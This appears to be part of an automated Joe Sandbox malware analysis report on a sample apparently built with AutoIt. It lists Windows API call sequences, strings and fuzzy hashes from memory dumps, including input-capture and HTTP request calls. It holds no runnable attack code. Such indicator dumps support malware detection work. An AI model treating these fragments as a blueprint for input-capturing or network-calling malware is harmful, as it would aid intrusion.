                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 010128B1
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 010128BC
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010128D8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010128DB
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 010128E4
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 010128F8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010128FB
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1ba690faa5de0a9c240a212ac7ced730cbe105fb776c7b331c4a41ee6fa2d4c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: 61f282ec7f4d1914d973137b0850ab239653782c82440cbe12901d1830bdce1f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ba690faa5de0a9c240a212ac7ced730cbe105fb776c7b331c4a41ee6fa2d4c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F21C2B4D00118BBCF14ABA5CC84DEEBBB8EF19350F100156B9A1A7295DB7E4409DB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 01012990
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 0101299B
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010129B7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010129BA
                                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 010129C3
                                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 010129D7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 010129DA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 046f58bd55d5e467ebe5e91d5cfd054f51646dc54d154a19aae86dd43f6e703f
                                                                                                                                                                                                                                                                                                        • Instruction ID: dbf788dcc546625399da7b62f260d71030866135e31177db0efc8604712b9b29
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 046f58bd55d5e467ebe5e91d5cfd054f51646dc54d154a19aae86dd43f6e703f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D521CFB5E00118BBDF10EBA4CC85EEEBBB9EF19340F104056B991A7199DB7E4809DB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01044539
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0104453C
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01044563
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01044586
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 010445FE
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 01044648
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 01044663
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0104467E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 01044692
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 010446AF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 460c2c202ec1817f5fe0a3c055e7ec3c1b613f5e93769be3c1bcb4e0d96c21df
                                                                                                                                                                                                                                                                                                        • Instruction ID: 261cc1c2de0f6c95e002354e0841d93224c6e402357f0f61c1878425922be115
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 460c2c202ec1817f5fe0a3c055e7ec3c1b613f5e93769be3c1bcb4e0d96c21df
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6617CB5A00258AFDB21DFA8CD80FEE77F8EB09300F1041A9FA84E7291D774A945DB50
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0101BB18
                                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB2C
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0101BB33
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB42
                                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101BB54
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB6D
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BB7F
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBC4
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBD9
                                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0101ABA8,?,00000001), ref: 0101BBE4
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d216065a8b7b1807195c8db8e9ef2712b646ec57b5ff16b0173ddacd12bfb11
                                                                                                                                                                                                                                                                                                        • Instruction ID: d097a1a956782b001c1e3b08eee7f07d0bf01c29a521bdf22e039821f9132675
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d216065a8b7b1807195c8db8e9ef2712b646ec57b5ff16b0173ddacd12bfb11
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2316BB5908215ABEB329B58D9C8FAA7BF9BB58212F104045FAC5D618CD7FDD8418F20
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3007
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3013
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE301E
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3029
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3034
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE303F
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE304A
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3055
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE3060
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE306E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FB2AF9
                                                                                                                                                                                                                                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00FB2B98
                                                                                                                                                                                                                                                                                                        • UnregisterHotKey.USER32(?), ref: 00FB2D7D
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00FF3A1B
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00FF3A80
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF3AAD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                        • String ID: close all
                                                                                                                                                                                                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 010289F2
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028A06
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 01028A30
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 01028A4A
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028A5C
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01028AA5
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 01028AF5
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00FB74D7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: GetClientRect.USER32(?,?), ref: 00FB758D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: GetWindowRect.USER32(?,?), ref: 00FB75CE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7567: ScreenToClient.USER32(?,?), ref: 00FB75F6
                                                                                                                                                                                                                                                                                                        • GetDC.USER32 ref: 00FF6083
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FF6096
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FF60A4
                                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00FF60B9
                                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00FF60C1
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FF6152
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetCursorPos.USER32(?), ref: 00FB19E1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: ScreenToClient.USER32(00000000,?), ref: 00FB19FE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000001), ref: 00FB1A23
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB19CD: GetAsyncKeyState.USER32(00000002), ref: 00FB1A3D
                                                                                                                                                                                                                                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 010495C7
                                                                                                                                                                                                                                                                                                        • ImageList_EndDrag.COMCTL32 ref: 010495CD
                                                                                                                                                                                                                                                                                                        • ReleaseCapture.USER32 ref: 010495D3
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0104966E
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01049681
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0104975B
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                        • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102CCB7
                                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102CCDF
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102CD0F
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0102CD67
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 0102CD7B
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0102CD86
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FF55AE,?,?,Bad directive syntax error,0104DCD0,00000000,00000010,?,?), ref: 0101A236
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00FF55AE,?), ref: 0101A23D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0101A301
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 010129F8
                                                                                                                                                                                                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 01012A0D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01012A9A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                                        • Opcode ID: 80000f65191575b8788656d46358ac41f27651567b21d96e5b0bff712c709b58
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9135be57374c3f80a10d02620dc226ff7cd3e288389343418731112e9a8ae037
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80000f65191575b8788656d46358ac41f27651567b21d96e5b0bff712c709b58
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34112977684707BBFA257225EC07DAA37DDDF05724B700016F985E5086FB6F64805618
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FB758D
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB75CE
                                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FB75F6
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FB773A
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00FB775B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 312a5a276b040bf83ca06446f599eea9174c71247db8bcd10d59bde365de7fac
                                                                                                                                                                                                                                                                                                        • Instruction ID: bea9009c4f8db694424fc9910f8983f80102f4455bbcdc928124c607385d8275
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 312a5a276b040bf83ca06446f599eea9174c71247db8bcd10d59bde365de7fac
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C1597990464AEFDB10DFA9C580BEDBBB1FF58320F14841AE895E7250DB34A941EF60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c3c9330a6908dc6b869430e64da1bb389b1762b0c40e1cca7d50a677b6b77605
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd5bce5b0fb35cb0effd51faebb1dc81ab6bfa546b3e2f86ac04cf4d7c83f2e1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3c9330a6908dc6b869430e64da1bb389b1762b0c40e1cca7d50a677b6b77605
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49614871D04384AFDB35BF76DC81B6D7BA8AF01330F04456DEA8497686E63AD801A751
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01045C24
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 01045C65
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000005,?,00000000), ref: 01045C6B
                                                                                                                                                                                                                                                                                                        • SetFocus.USER32(?,?,00000005,?,00000000), ref: 01045C6F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010479F2: DeleteObject.GDI32(00000000), ref: 01047A1E
                                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 01045CAB
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01045CB8
                                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01045CEB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01045D25
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01045D34
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
